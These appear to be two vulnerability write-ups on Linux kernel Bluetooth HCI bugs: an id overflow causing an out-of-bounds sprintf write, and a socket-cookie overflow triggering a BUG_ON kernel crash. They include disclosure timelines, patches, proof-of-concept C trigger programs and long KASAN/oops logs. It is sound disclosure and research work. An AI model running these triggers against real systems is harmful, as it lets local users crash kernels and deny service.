This blog post describes an (unexploitable, yet) out of bounds write bug in the HCI device id allocation mechanism in the Linux Kernel.
The Host Controller Interface (HCI) socket mechanism provides a direct interface from user-space to the Bluetooth microcontroller via the local Bluetooth adapter. This interface is used for example to understand which Bluetooth adapters are present on your system.
Here is an example strace log from hciconfig, a BlueZ util, analogous to ifconfig, which displays local Bluetooth adapters:
socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI) = 3
[...]
ioctl(3, HCIGETDEVLIST, 0x5573a94122a0) = 0
ioctl(3, HCIGETDEVINFO, 0x5573a81e0880) = 0
[...]
Which in turn, outputs:
hci0: Type: Primary Bus: USB
BD Address: 5C:5F:67:99:3C:6A ACL MTU: 8192:128 SCO MTU: 64:128
DOWN
RX bytes:504 acl:0 sco:0 events:22 errors:0
TX bytes:335 acl:0 sco:0 commands:22 errors:0
The bug exists in net/bluetooth/hci_core.c:
/* Register HCI device */
int hci_register_dev(struct hci_dev *hdev)
{
int id, error;
[...]
switch (hdev->dev_type) {
case HCI_PRIMARY:
id = ida_simple_get(&hci_index_ida, 0, 0, GFP_KERNEL);
break;
case HCI_AMP:
id = ida_simple_get(&hci_index_ida, 1, 0, GFP_KERNEL);
break;
[...]
if (id < 0)
return id;
sprintf(hdev->name, "hci%d", id);
hdev->id = id;
Where an out of bounds write occurs at sprintf() to hdev->name when the id local variable has a decimal notation which value is greater than 9999.
The id local variable, is defined as an int, which would be 4 bytes in size on modern architectures.
int hci_register_dev(struct hci_dev *hdev)
{
int id, error;
The name member of hdev however, is set up to 8 bytes in size:
struct hci_dev {
[...]
char name[8];
__u16 id;
Where ida_simple_get(), which generates the id, has an upper bound of 2^31, because of the id<0 test.
switch (hdev->dev_type) {
case HCI_PRIMARY:
id = ida_simple_get(&hci_index_ida, 0, 0, GFP_KERNEL);
break;
case HCI_AMP:
id = ida_simple_get(&hci_index_ida, 1, 0, GFP_KERNEL);
break;
This, in practice means that an id with value up to (2^31)-1, which translates to 2147483647 in decimal notation could be generated for HCI devices.
The sprintf function formats the hci%d formatted string into hdev->name. It is trivial to see that if %d would be greater than 9999, then an out of bounds write would occur.
sprintf(hdev->name, "hci%d", id);
Furthermore, when setting the local variable id to hdev->id, which is defined as a 2 bytes unsigned integer, an integer truncation would occur.
hdev->id = id;
The fix seems trivial, simply set a maximum HCI_MAX_ID constant to ida_simple_get(), which would set an upper bound of 10000 to the id generation.
[..]
- id = ida_simple_get(&hci_index_ida, 0, 0, GFP_KERNEL);
+ id = ida_simple_get(&hci_index_ida, 0, HCI_MAX_ID, GFP_KERNEL);
break;
case HCI_AMP:
- id = ida_simple_get(&hci_index_ida, 1, 0, GFP_KERNEL);
+ id = ida_simple_get(&hci_index_ida, 1, HCI_MAX_ID, GFP_KERNEL);
[...]
- sprintf(hdev->name, "hci%d", id);
+ snprintf(hdev->name, sizeof(hdev->name), "hci%d", id);
To exploit the out of bounds write bug, 10000 Bluetooth devices should be connected. To simulate this behaviour, I loaded the hci_vhci.ko kernel module to simulate a connection of multiple Bluetooth devices. Loading the driver exposed a character device named /dev/vhci, which is accessible from root permissions only.
To trigger the id truncation bug, I simulated a connection of 65537 (2^16+1) Bluetooth devices using the following code:
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/resource.h>
#include <sys/time.h>
int main(){
struct rlimit rlim;
rlim.rlim_cur = 65537;
rlim.rlim_max = 65537;
setrlimit(RLIMIT_NOFILE, &rlim);
for(int i = 0; i < 65537;i++){
int fd = open("/dev/vhci", O_RDWR);
}
}
I used the setrlimit system call to increase the maximum number of open file descriptors of the relevant exploit.
The above scenario could lead to an out of bounds write, using the HCIGETDEVINFO ioctl handler (at /net/bluetooth/hci_core.c):
int hci_get_dev_info(void __user *arg)
{
struct hci_dev *hdev;
struct hci_dev_info di;
[...]
if (copy_from_user(&di, arg, sizeof(di)))
return -EFAULT;
hdev = hci_dev_get(di.dev_id);
[...]
strcpy(di.name, hdev->name);
di.bdaddr = hdev->bdaddr;
[...]
if (copy_to_user(arg, &di, sizeof(di)))
err = -EFAULT;
}
There no bounds checking and there is an explicit use of strcpy().
Where struct hci_dev includes the following member order:
struct hci_dev_info {
__u16 dev_id;
char name[8];
bdaddr_t bdaddr;
[...]
Given an hdev->name with an id value which is greater than 99999 in decimal notaion, any user-space tool that uses the HCIGETDEVINFO ioctl could be tricked into getting an incorrect Bluetooth device address.
Furthermore, the given HCI id would return the first id value set (modulo to 65536) struct hci_dev. For example, setting an ioctl with HCIGETDEVINFO of a HCI device with id value of 65537 would return a struct hci_dev with id value of 1.
02/05/2022 - Bug reported to security@kernel.org
07/05/2022 - The commit was sent publicly, without disclosing any exploitation vectors or crash logs, as requested
11/05/2022 - The commit was merged upstream to all Linux Kernel stable versions
The following KASAN logs were displayed when triggering the bugs described above:
[ 4294.772216] BUG: KASAN: use-after-free in kobject_put+0x31/0x460 [ 4294.772219] Read of size 1 at addr ffff88828a734d24 by task openfd/2468 [ 4294.772242] CPU: 3 PID: 2468 Comm: openfd Tainted: G W EL 5.10.106 #1 [ 4294.772243] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/22/2020 [ 4294.772245] Call Trace: [ 4294.772250] dump_stack+0x91/0xbc [ 4294.772253] print_address_description.constprop.0+0x1c/0x210 [ 4294.772256] ? _raw_spin_lock_irqsave+0xa6/0x150 [ 4294.772259] ? slab_free_freelist_hook+0x6a/0x3f0 [ 4294.772262] ? _raw_write_unlock_bh+0x50/0x50 [ 4294.772264] ? kobject_put+0x16c/0x460 [ 4294.772266] ? kobject_put+0x31/0x460 [ 4294.772268] ? kobject_put+0x31/0x460 [ 4294.772271] kasan_report.cold+0x1f/0x37 [ 4294.772273] ? kobject_put+0x31/0x460 [ 4294.772275] kobject_put+0x31/0x460 [ 4294.772280] vhci_release+0x6b/0x110 [hci_vhci] [ 4294.772284] __fput+0x18f/0x8d0 [ 4294.772288] task_work_run+0xea/0x1e0 [ 4294.772290] do_exit+0x915/0x2c20 [ 4294.772293] ? put_timespec64+0x9c/0x100 [ 4294.772295] ? mm_update_next_owner+0xa40/0xa40 [ 4294.772298] ? hrtimer_active+0x7c/0x1c0 [ 4294.772300] ? _raw_spin_lock_irq+0x96/0x130 [ 4294.772303] ? do_nanosleep+0x3c7/0x550 [ 4294.772305] do_group_exit+0x7d/0x320 [ 4294.772307] get_signal+0x34d/0x1f60 [ 4294.772311] arch_do_signal+0x88/0x26e0 [ 4294.772314] ? __hrtimer_init+0x230/0x230 [ 4294.772316] ? copy_siginfo_to_user32+0x80/0x80 [ 4294.772318] ? jiffies_to_timespec64+0x90/0x90 [ 4294.772321] ? common_nsleep+0x63/0x80 [ 4294.772323] ? __x64_sys_clock_nanosleep+0x224/0x390 [ 4294.772326] ? __ia32_sys_clock_adjtime+0x60/0x60 [ 4294.772329] exit_to_user_mode_prepare+0xd7/0x120 [ 4294.772332] syscall_exit_to_user_mode+0x28/0x140 [ 4294.772334] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 4294.772337] RIP: 0033:0x7f27a255fc0a [ 4294.772338] Code: Unable to access opcode bytes at RIP 0x7f27a255fbe0. [ 4294.772340] RSP: 002b:00007ffcb54e9790 EFLAGS: 00000246 ORIG_RAX: 00000000000000e6 [ 4294.772343] RAX: fffffffffffffdfc RBX: ffffffffffffff80 RCX: 00007f27a255fc0a [ 4294.772345] RDX: 00007ffcb54e97d0 RSI: 0000000000000000 RDI: 0000000000000000 [ 4294.772346] RBP: 0000000000000000 R08: 0000000000000000 R09: 00007f27a268a1b0 [ 4294.772348] R10: 00007ffcb54e97d0 R11: 0000000000000246 R12: 000055607fcb20d0 [ 4294.772350] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 [ 4294.772354] Allocated by task 9921: [ 4294.772357] kasan_save_stack+0x1b/0x40 [ 4294.772359] __kasan_kmalloc.constprop.0+0xc2/0xd0 [ 4294.772388] hci_alloc_dev+0x2b/0xda0 [bluetooth] [ 4294.772391] __vhci_create_device+0xd4/0x580 [hci_vhci] [ 4294.772393] vhci_open_timeout+0x40/0x80 [hci_vhci] [ 4294.772395] process_one_work+0x51b/0x10f0 [ 4294.772397] worker_thread+0x493/0x13a0 [ 4294.772399] kthread+0x24b/0x330 [ 4294.772402] ret_from_fork+0x1f/0x30 [ 4294.772404] Freed by task 2468: [ 4294.772407] kasan_save_stack+0x1b/0x40 [ 4294.772408] kasan_set_track+0x1c/0x30 [ 4294.772410] kasan_set_free_info+0x1b/0x30 [ 4294.772412] __kasan_slab_free+0x110/0x150 [ 4294.772414] slab_free_freelist_hook+0x6a/0x3f0 [ 4294.772417] kfree+0xfc/0x910 [ 4294.772445] bt_host_release+0x4e/0x90 [bluetooth] [ 4294.772447] device_release+0xf2/0x320 [ 4294.772450] kobject_put+0x154/0x460 [ 4294.772452] vhci_release+0x63/0x110 [hci_vhci] [ 4294.772454] __fput+0x18f/0x8d0 [ 4294.772456] task_work_run+0xea/0x1e0 [ 4294.772458] do_exit+0x915/0x2c20 [ 4294.772460] do_group_exit+0x7d/0x320 [ 4294.772462] get_signal+0x34d/0x1f60 [ 4294.772464] arch_do_signal+0x88/0x26e0 [ 4294.772467] exit_to_user_mode_prepare+0xd7/0x120 [ 4294.772469] syscall_exit_to_user_mode+0x28/0x140 [ 4294.772471] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 4294.772474] The buggy address belongs to the object at ffff88828a734000 which belongs to the cache kmalloc-8k of size 8192 [ 4294.772477] The buggy address is located 3364 bytes inside of 8192-byte region [ffff88828a734000, ffff88828a736000) [ 4294.772479] The buggy address belongs to the page: [ 4294.772483] page:00000000608c5702 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x28a730 [ 4294.772485] head:00000000608c5702 order:3 compound_mapcount:0 compound_pincount:0 [ 4294.772487] flags: 0x17ffffc0010200(slab|head) [ 4294.772490] raw: 0017ffffc0010200 dead000000000100 dead000000000122 ffff88810004ee40 [ 4294.772493] raw: 0000000000000000 0000000000020002 00000001ffffffff 0000000000000000 [ 4294.772494] page dumped because: kasan: bad access detected [ 4294.772496] Memory state around the buggy address: [ 4294.772522] ffff88828a734c00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb [ 4294.772524] ffff88828a734c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb [ 4294.772526] >ffff88828a734d00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb [ 4294.772528] ^ [ 4294.772531] ffff88828a734d80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb [ 4294.772533] ffff88828a734e00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb [ 4294.772535] ================================================================== [ 4294.772537] Disabling lock debugging due to kernel taint [ 4294.772538] ------------[ cut here ]------------ [ 4294.772539] refcount_t: underflow; use-after-free. [ 4294.772541] =======================================================================
]]>[ 4348.819535] BUG: kernel NULL pointer dereference, address: 0000000000000078 [ 4348.819541] #PF: supervisor read access in kernel mode [ 4348.819543] #PF: error_code(0x0000) - not-present page [ 4348.819546] PGD 0 P4D 0 [ 4348.819551] Oops: 0000 [#1] SMP KASAN NOPTI [ 4348.819555] CPU: 9 PID: 2468 Comm: openfd Tainted: G B W EL 5.10.106 #1 [ 4348.819557] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/22/2020 [ 4348.819562] RIP: 0010:ida_free+0x17e/0x350 [ 4348.819566] Code: b5 d1 00 eb 61 a8 07 0f 85 d4 01 00 00 4c 89 f8 be 08 00 00 00 48 c1 f8 06 4c 8d 44 c5 00 4c 89 c7 4c 89 04 24 e8 42 4f 90 ff <4c> 0f a3 7d 00 72 79 48 8b 6c 24 40 40 f6 c5 07 0f 85 61 01 00 00 [ 4348.819568] RSP: 0018:ffff8881428c7980 EFLAGS: 00010002 [ 4348.819572] RAX: 0000000000000001 RBX: 1ffff11028518f32 RCX: ffffffffacb1235e [ 4348.819574] RDX: 0000000000000000 RSI: 0000000000000008 RDI: 0000000000000078 [ 4348.819576] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000080 [ 4348.819578] R10: ffffed1028518f24 R11: 0000000000000001 R12: 0000000000000246 [ 4348.819580] R13: ffff8881428c79c0 R14: 00000000000083fe R15: 00000000000003fe [ 4348.819583] FS: 0000000000000000(0000) GS:ffff888568080000(0000) knlGS:0000000000000000 [ 4348.819585] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 4348.819588] CR2: 0000000000000078 CR3: 00000002cb47c002 CR4: 00000000007706e0 [ 4348.819593] PKRU: 55555554 [ 4348.819595] Call Trace: [ 4348.819600] ? ida_destroy+0x2f0/0x2f0 [ 4348.819632] ? hci_adv_instances_clear+0x1df/0x3d0 [bluetooth] [ 4348.819660] ? hci_cleanup_dev+0x5d7/0xbe0 [bluetooth] [ 4348.819689] ? bt_link_release+0x20/0x20 [bluetooth] [ 4348.819718] bt_host_release+0x66/0x90 [bluetooth] [ 4348.819723] device_release+0xf2/0x320 [ 4348.819726] kobject_put+0x154/0x460 [ 4348.819731] vhci_release+0x6b/0x110 [hci_vhci] [ 4348.819735] __fput+0x18f/0x8d0 [ 4348.819739] task_work_run+0xea/0x1e0 [ 4348.819742] do_exit+0x915/0x2c20 [ 4348.819746] ? put_timespec64+0x9c/0x100 [ 4348.819749] ? mm_update_next_owner+0xa40/0xa40 [ 4348.819752] ? hrtimer_active+0x7c/0x1c0 [ 4348.819756] ? _raw_spin_lock_irq+0x96/0x130 [ 4348.819759] ? do_nanosleep+0x3c7/0x550 [ 4348.819762] do_group_exit+0x7d/0x320 [ 4348.819765] get_signal+0x34d/0x1f60 [ 4348.819769] arch_do_signal+0x88/0x26e0 [ 4348.819772] ? __hrtimer_init+0x230/0x230 [ 4348.819775] ? copy_siginfo_to_user32+0x80/0x80 [ 4348.819778] ? jiffies_to_timespec64+0x90/0x90 [ 4348.819781] ? common_nsleep+0x63/0x80 [ 4348.819784] ? __x64_sys_clock_nanosleep+0x224/0x390 [ 4348.819787] ? __ia32_sys_clock_adjtime+0x60/0x60 [ 4348.819791] exit_to_user_mode_prepare+0xd7/0x120 [ 4348.819795] syscall_exit_to_user_mode+0x28/0x140 [ 4348.819798] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 4348.819801] RIP: 0033:0x7f27a255fc0a [ 4348.819803] Code: Unable to access opcode bytes at RIP 0x7f27a255fbe0. [ 4348.819805] RSP: 002b:00007ffcb54e9790 EFLAGS: 00000246 ORIG_RAX: 00000000000000e6 [ 4348.819809] RAX: fffffffffffffdfc RBX: ffffffffffffff80 RCX: 00007f27a255fc0a [ 4348.819811] RDX: 00007ffcb54e97d0 RSI: 0000000000000000 RDI: 0000000000000000 [ 4348.819813] RBP: 0000000000000000 R08: 0000000000000000 R09: 00007f27a268a1b0 [ 4348.819815] R10: 00007ffcb54e97d0 R11: 0000000000000246 R12: 000055607fcb20d0 [ 4348.819818] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 [ 4348.819820] Modules linked in: hci_vhci(E) uinput(E) rfcomm(E) bnep(E) btusb(E) btrtl(E) btbcm(E) btintel(E) bluetooth(E) jitterentropy_rng(E) vsock_loopback(E) drbg(E) vmw_vsock_virtio_transport_common(E) intel_rapl_msr(E) intel_rapl_common(E) intel_pmc_core_pltdrv(E) snd_ens1371(E) vmw_vsock_vmci_transport(E) intel_pmc_core(E) vsock(E) ghash_clmulni_intel(E) aes_generic(E) snd_ac97_codec(E) ac97_bus(E) aesni_intel(E) gameport(E) crypto_simd(E) snd_rawmidi(E) cryptd(E) ansi_cprng(E) snd_seq_device(E) glue_helper(E) snd_pcm(E) rapl(E) ecdh_generic(E) snd_timer(E) rfkill(E) ecc(E) snd(E) libaes(E) soundcore(E) vmw_balloon(E) joydev(E) sg(E) serio_raw(E) pcspkr(E) vmw_vmci(E) evdev(E) ac(E) msr(E) parport_pc(E) ppdev(E) lp(E) parport(E) fuse(E) configfs(E) ip_tables(E) x_tables(E) autofs4(E) ext4(E) crc16(E) mbcache(E) jbd2(E) btrfs(E) blake2b_generic(E) raid10(E) raid456(E) async_raid6_recov(E) async_memcpy(E) async_pq(E) async_xor(E) async_tx(E) xor(E) raid6_pq(E) libcrc32c(E) [ 4348.819904] crc32c_generic(E) raid1(E) raid0(E) multipath(E) linear(E) md_mod(E) hid_generic(E) usbhid(E) hid(E) sd_mod(E) t10_pi(E) crc_t10dif(E) crct10dif_generic(E) vmwgfx(E) sr_mod(E) cdrom(E) ttm(E) ata_generic(E) uhci_hcd(E) ehci_pci(E) drm_kms_helper(E) mptspi(E) ata_piix(E) crct10dif_pclmul(E) ehci_hcd(E) crct10dif_common(E) cec(E) mptscsih(E) crc32_pclmul(E) crc32c_intel(E) psmouse(E) mptbase(E) libata(E) usbcore(E) scsi_transport_spi(E) drm(E) e1000(E) scsi_mod(E) usb_common(E) i2c_piix4(E) button(E) [ 4348.820013] CR2: 0000000000000078 [ 4348.820016] ---[ end trace 8dfc2a7c580dec5a ]--- [ 4348.820021] RIP: 0010:ida_free+0x17e/0x350 [ 4348.820024] Code: b5 d1 00 eb 61 a8 07 0f 85 d4 01 00 00 4c 89 f8 be 08 00 00 00 48 c1 f8 06 4c 8d 44 c5 00 4c 89 c7 4c 89 04 24 e8 42 4f 90 ff <4c> 0f a3 7d 00 72 79 48 8b 6c 24 40 40 f6 c5 07 0f 85 61 01 00 00 [ 4348.820026] RSP: 0018:ffff8881428c7980 EFLAGS: 00010002 [ 4348.820029] RAX: 0000000000000001 RBX: 1ffff11028518f32 RCX: ffffffffacb1235e [ 4348.820031] RDX: 0000000000000000 RSI: 0000000000000008 RDI: 0000000000000078 [ 4348.820033] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000080 [ 4348.820035] R10: ffffed1028518f24 R11: 0000000000000001 R12: 0000000000000246 [ 4348.820038] R13: ffff8881428c79c0 R14: 00000000000083fe R15: 00000000000003fe [ 4348.820040] FS: 0000000000000000(0000) GS:ffff888568080000(0000) knlGS:0000000000000000 [ 4348.820042] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 4348.820045] CR2: 0000000000000078 CR3: 00000002cb47c002 CR4: 00000000007706e0 [ 4348.820065] PKRU: 55555554 [ 4348.820067] Fixing recursive fault but reboot is needed!
This blog post describes a recent bug I found in the HCI socket cookie generation mechanism.
I have written a short summary regarding HCI sockets in my previous blog post.
The bug exists in lib/idr.c, in the ida_free function, if the id parameter has a negative value then a BUG_ON macro is triggered:
* ida_free() - Release an allocated ID.
* @ida: IDA handle.
* @id: Previously allocated ID.
*
* Context: Any context.
*/
void ida_free(struct ida *ida, unsigned int id)
{
BUG_ON((int)id < 0);
The bug could be triggered as a local user, using HCI sockets.
Each time the ioctl handler HCIGETDEVINFO is called on a newly initialized HCI socket, with socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI), a cookie value is generated: a 4 byte signed integer (on modern architectures):
static int hci_sock_ioctl(struct socket *sock, unsigned int cmd,
unsigned long arg)
{
void __user *argp = (void __user *)arg;
struct sock *sk = sock->sk;
[...]
if (hci_pi(sk)->channel != HCI_CHANNEL_RAW) {
err = -EBADFD;
goto done;
}
/* When calling an ioctl on an unbound raw socket, then ensure
* that the monitor gets informed. Ensure that the resulting event
* is only send once by checking if the cookie exists or not. The
* socket cookie will be only ever generated once for the lifetime
* of a given socket.
*/
if (hci_sock_gen_cookie(sk)) {
From net/bluetooth/hci_sock.c:
static bool hci_sock_gen_cookie(struct sock *sk)
{
int id = hci_pi(sk)->cookie;
if (!id) {
id = ida_simple_get(&sock_cookie_ida, 1, 0, GFP_KERNEL);
if (id < 0)
id = 0xffffffff;
hci_pi(sk)->cookie = id;
Note that ida_simple_get() does set an upper bound to the id member of each HCI socket.
If 2^31 HCI sockets are created, this should trigger a negative cookie value, which when the 2^31 socket is released the BUG_ON macro is triggered, given a 4 byte size signed integer.
When the socket is released, the ida_simple_remove() is called with the cookie value:
static void hci_sock_free_cookie(struct sock *sk)
{
int id = hci_pi(sk)->cookie;
if (id) {
hci_pi(sk)->cookie = 0xffffffff;
ida_simple_remove(&sock_cookie_ida, id);
Where ida_simple_remove() is defined as:
#define ida_simple_remove(ida, id) ida_free(ida, id)
I have faced some difficulties, firstly with small RAM space. Given that allocating 2^31 HCI sockets would trigger a creation of a large amount of resident pages in RAM, I tried to bypass this using another bug, in the HCI socket’s bind implementation:
static int hci_sock_bind(struct socket *sock, struct sockaddr *addr,
int addr_len)
{
struct sockaddr_hci haddr;
[...]
case HCI_CHANNEL_MONITOR:
if (haddr.hci_dev != HCI_DEV_NONE) {
err = -EINVAL;
goto done;
}
if (!capable(CAP_NET_RAW)) {
err = -EPERM;
goto done;
}
hci_pi(sk)->channel = haddr.hci_channel;
When an HCI socket is bound to a HCI_CHANNEL_MONITOR channel, when freeing the socket; the socket object is freed, yet ida_simple_remove() is not called with the cookie id assigned to the HCI socket. Albeit, this requires a CAP_NET_RAW capability in the root user namespace.
static int hci_sock_release(struct socket *sock)
{
struct sock *sk = sock->sk;
struct hci_dev *hdev;
struct sk_buff *skb;
[...]
switch (hci_pi(sk)->channel) {
case HCI_CHANNEL_MONITOR:
atomic_dec(&monitor_promisc);
break;
case HCI_CHANNEL_RAW:
case HCI_CHANNEL_USER:
case HCI_CHANNEL_CONTROL:
/* Send event to monitor */
skb = create_monitor_ctrl_close(sk);
if (skb) {
hci_send_to_channel(HCI_CHANNEL_MONITOR, skb,
HCI_SOCK_TRUSTED, NULL);
kfree_skb(skb);
}
hci_sock_free_cookie(sk);
break;
}
[...]
The function hci_sock_free_cookie() is called only when the HCI socket channel is either HCI_CHANNEL_RAW, HCI_CHANNEL_USER or HCI_CHANNEL_CONTROL.
This allows me to trigger the BUG_ON macro without any RAM size requirements.
The fix was simply to remove the BUG_ON macro from the ida_free() function:
void ida_free(struct ida *ida, unsigned int id)
{
[...]
- BUG_ON((int)id < 0);
+ if ((int)id < 0)
+ return;
// SPDX-License-Identifier: GPL-2.0-or-later
/*
*
* BlueZ - Bluetooth protocol stack for Linux
*
* Copyright (C) 2000-2001 Qualcomm Incorporated
* Copyright (C) 2002-2003 Maxim Krasnyansky <maxk@qualcomm.com>
* Copyright (C) 2002-2010 Marcel Holtmann <marcel@holtmann.org>
*
*
*/
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include "lib/bluetooth.h"
#include "lib/hci.h"
int main(){
int fd;
struct hci_dev_info di = {0};
di.dev_id = 0;
struct sockaddr_hci haddr = {0};
haddr.hci_family = AF_BLUETOOTH;
haddr.hci_channel=2; // HCI_CHANNEL_MONITOR
haddr.hci_dev = 0xffff; // HCI_DEV_NONE
for(uint64_t i = 0; i < 2147483648;i++){
fd = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
ioctl(fd, HCIGETDEVINFO, &di);
bind(fd, (struct sockaddr *)&haddr, sizeof(struct
sockaddr_hci));
close(fd);
}
}
The "BUG_ON" failed assertion trigger, run as a local user after 2^31-1
HCI sockets’ cookies were generated:
// SPDX-License-Identifier: GPL-2.0-or-later
/*
*
* BlueZ - Bluetooth protocol stack for Linux
*
* Copyright (C) 2000-2001 Qualcomm Incorporated
* Copyright (C) 2002-2003 Maxim Krasnyansky <maxk@qualcomm.com>
* Copyright (C) 2002-2010 Marcel Holtmann <marcel@holtmann.org>
*
*
*/
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include "lib/bluetooth.h"
#include "lib/hci.h"
int main(){
struct hci_dev_info di = {0};
di.dev_id = 0;
int fd = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
ioctl(fd, HCIGETDEVINFO, &di);
close(fd);
}
This, in turn triggers the following log:
[69803.437346] kernel BUG at /build/linux-hwe-5.4-qwJpmT/linux-hwe-5.4- 5.4.0/lib/idr.c:492! [69803.437351] invalid opcode: 0000 [#1] SMP NOPTI [69803.437353] CPU: 2 PID: 26662 Comm: hci_crash Tainted: G OE 5.4.0-97-generic #110~18.04.1-Ubuntu [69803.437354] Hardware name: Dell Inc. Precision 5820 Tower/06JWJY, BIOS 2.5.1 10/20/2020 [69803.437359] RIP: 0010:ida_free+0x120/0x140 [69803.437361] Code: 48 8d 7d a8 31 f6 e8 9f ee 00 00 be 00 04 00 00 4c 89 ef e8 52 9c a7 ff 48 3d 00 04 00 00 75 ce 4c 89 ef e8 62 61 7f ff eb b9 <0f> 0b 4b 8d 74 2d 01 48 8d 7d a8 e8 70 04 01 00 eb b2 e8 09 f4 5e [69803.437362] RSP: 0018:ffffa52bc1cabdb0 EFLAGS: 00010286 [69803.437363] RAX: 00000000003fffff RBX: ffff978253453000 RCX: 0000001088064d8d [69803.437364] RDX: 0000001088064d8c RSI: 00000000ffffffff RDI: ffffffffc0c39250 [69803.437365] RBP: ffffa52bc1cabe08 R08: ffff97825fcb7a80 R09: ffff9781266c7400 [69803.437366] R10: 0000000000000008 R11: ffff9781241310c0 R12: 00000000000003ff [69803.437366] R13: ffffffffc0c437c0 R14: ffff9782599eef20 R15: ffff9781870a3240 [69803.437368] FS: 00000000010bc300(0000) GS:ffff97825fc80000(0000) knlGS:0000000000000000 [69803.437368] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [69803.437370] CR2: 00007ffe67758020 CR3: 0000000f1d490004 CR4: 00000000003606e0 [69803.437371] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [69803.437371] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [69803.437372] Call Trace: [69803.437393] hci_sock_release+0x19a/0x1c0 [bluetooth] [69803.437396] __sock_release+0x42/0xc0 [69803.437397] sock_close+0x15/0x20 [69803.437399] __fput+0xc6/0x260 [69803.437400] ____fput+0xe/0x10 [69803.437402] task_work_run+0x9d/0xc0 [69803.437404] exit_to_usermode_loop+0x109/0x130 [69803.437406] do_syscall_64+0x170/0x190 [69803.437408] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [69803.437410] RIP: 0033:0x43dd73 [69803.437411] Code: 64 89 02 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 66 90 64 8b 04 25 18 00 00 00 85 c0 75 14 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 45 c3 0f 1f 40 00 48 83 ec 18 89 7c 24 0c e8 [69803.437411] RSP: 002b:00007ffe6765c038 EFLAGS: 00000246 ORIG_RAX: 0000000000000003 [69803.437413] RAX: 0000000000000000 RBX: 0000000000400488 RCX: 000000000043dd73 [69803.437413] RDX: 00007ffe6765c040 RSI: 00000000800448d3 RDI: 0000000000000003 [69803.437414] RBP: 00007ffe6765c0a0 R08: 000000000000000c R09: 0000000000000002 [69803.437415] R10: 0000000000000002 R11: 0000000000000246 R12: 0000000000402b20 [69803.437415] R13: 0000000000000000 R14: 00000000004ac018 R15: 0000000000400488 [69803.437417] Modules linked in: cmac rfcomm bnep btusb btrtl btbcm btintel bluetooth ecdh_generic ecc twofish_generic twofish_avx_x86_64 twofish_x86_64_3way twofish_x86_64 twofish_common serpent_avx2 serpent_avx_x86_64 serpent_sse2_x86_64 serpent_generic blowfish_generic blowfish_x86_64 blowfish_common cast5_avx_x86_64 cast5_generic cast_common des_generic libdes camellia_generic camellia_aesni_avx2 camellia_aesni_avx_x86_64 camellia_x86_64 xcbc md4 algif_hash xfrm_user xfrm4_tunnel tunnel4 ipcomp xfrm_ipcomp esp4 ah4 af_key xfrm_algo anyconnect_kdf(OE) snd_hda_codec_hdmi intel_rapl_msr intel_rapl_common nls_iso8859_1 dell_smm_hwmon snd_hda_codec_realtek snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_intel_dspcfg isst_if_common snd_hda_codec skx_edac nfit snd_hda_core snd_hwdep snd_pcm x86_pkg_temp_thermal intel_powerclamp coretemp kvm_intel snd_seq_midi snd_seq_midi_event snd_rawmidi kvm snd_seq rapl intel_cstate snd_seq_device snd_timer ucsi_ccg dell_wmi ioatdma mei_me typec_ucsi [69803.437442] snd serio_raw dell_smbios dcdbas sparse_keymap wmi_bmof intel_wmi_thunderbolt typec joydev dell_wmi_descriptor input_leds mei soundcore dca acpi_tad mac_hid ipt_REJECT nf_reject_ipv4 nf_log_ipv4 nf_log_common xt_LOG xt_limit xt_tcpudp xt_addrtype xt_conntrack ip6_tables nf_conntrack_netbios_ns nf_conntrack_broadcast sch_fq_codel nf_nat_ftp nf_nat nf_conntrack_ftp nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c parport_pc iptable_filter bpfilter ppdev lp parport ip_tables x_tables autofs4 algif_skcipher af_alg dm_crypt hid_generic usbhid hid uas usb_storage nouveau nvme nvme_core mxm_wmi video i2c_algo_bit ttm crct10dif_pclmul crc32_pclmul drm_kms_helper ghash_clmulni_intel aesni_intel syscopyarea sysfillrect crypto_simd sysimgblt cryptd fb_sys_fops glue_helper drm vmd e1000e i2c_nvidia_gpu ahci libahci wmi [69803.437471] ---[ end trace 650bd857a8213515 ]--- [69803.515535] RIP: 0010:ida_free+0x120/0x140 [69803.515544] Code: 48 8d 7d a8 31 f6 e8 9f ee 00 00 be 00 04 00 00 4c 89 ef e8 52 9c a7 ff 48 3d 00 04 00 00 75 ce 4c 89 ef e8 62 61 7f ff eb b9 <0f> 0b 4b 8d 74 2d 01 48 8d 7d a8 e8 70 04 01 00 eb b2 e8 09 f4 5e [69803.515548] RSP: 0018:ffffa52bc1cabdb0 EFLAGS: 00010286 [69803.515553] RAX: 00000000003fffff RBX: 